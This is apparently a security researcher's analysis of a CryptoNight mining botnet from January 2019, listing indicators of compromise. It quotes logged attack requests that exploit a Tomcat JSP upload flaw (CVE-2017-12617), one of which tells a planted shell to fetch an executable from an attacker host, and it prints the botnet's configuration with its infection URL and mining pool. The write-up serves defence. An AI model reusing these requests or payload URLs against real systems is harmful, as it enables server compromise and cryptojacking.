CryptoNight mining botnet | Joachim De Zutter
January 2019

Log entries:
117.50.10.51 - - [16/Jan/2019:07:51:28 +0200] "PUT /FxCodeShell.jsp%20 HTTP/1.1" 405 237 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
117.50.10.51 - - [16/Jan/2019:07:51:28 +0200] "PUT /FxCodeShell.jsp::$DATA HTTP/1.1" 405 243 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
117.50.10.51 - - [16/Jan/2019:07:51:28 +0200] "PUT /FxCodeShell.jsp/ HTTP/1.1" 405 237 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
117.50.10.51 - - [16/Jan/2019:07:51:29 +0200] "GET /FxCodeShell.jsp?wiew=FxxkMyLie1836710Aa&os=1&address=http://a46.bulehero.in/download.exe HTTP/1.1" 404 213 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
Snort alert:
01/16-07:51:28.798636  [**] [1:2024808:4] ET WEB_SPECIFIC_APPS Apache Tomcat Possible CVE-2017-12617 JSP Upload Bypass Attempt [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 117.50.10.51:60453 -> #.#.#.#:80
Downloader:
File name: download.exe
File size: 322560
MD5: 12c09f34160a80cbe3f9f405a27ded4d
SHA1: 6d928168e8ed7ae3d4766877c4b99fe03a6711ab
SHA256: a16243c45805e2b249babf3115915730c7b91b378f6a6795fac08436c0e75943
SSDeep: 6144:WIw4eq0/4hF0sPNJIf3kvpmI/y4Dk+figYigExVsc29FhC6Gh:Wq0wh5MUQ4Dk+figpPxie62
File is UPX compressed.
VirusTotal report
Hybrid Analysis report

Miner:
File name: docropool.exe / mscteui.exe / unloadcur.exe
File size: 3769344
MD5: 36968503f54dad1165a47ee5dec357ff
SHA1: 0f007a09c859cf1c0eef85b55068b9770e0adb2a
SHA256: 100b49c780ac60366ff07517b96d4b090f3a420d24d5200b9252c5e0eab38380
SSDeep: 98304:hNguFpgSHhKafJo569O80DSRQK7Mxr4uYeV+R/bGlicUw3YIkaDR3AuVgc3Uv1:hNc06U7RQ9xaeVITP43Xkw3Pe
File is UPX compressed.
VirusTotal report
Hybrid Analysis report

Configuration:
File name: Cfg.ini
File size: 410
MD5: 9f4584b7f16596f1658a89fb4b6254ec
SHA1: dcd6adc031396231157482351104615b8bec6f98
SHA256: e1a3af59b3cdb38c53bbdc99db5819d07cc41c884cff2aebbe7d3ad4e7263244
Configuration file contents:
[UpdateNode]
Us=a47.bulehero.in
Kr=a48.bulehero.in
[MainUpdate]
MainVersion=20190114
MainExeName=docropool
MainSize=3769344
[Infect]
DownUrl=http://a46.bulehero.in/download.exe
[MinIng]
MineUpdate=Off
variant=--variant=-1
Address=4AN9zC5PGgQWtg1mTNZDySHSS79nG1qd4FWA1rVjEGZV84R8BqoLN9wU1UCnmvu1rj89bjY4Fat1XgEiKks6FoeiRi1EHhh
MiningPool=pool.bulehero.in:7777
Algorithm=cryptonight
Multiple Cryptocurrency Miner Botnets Start to Exploit the New ThinkPHP Vulnerability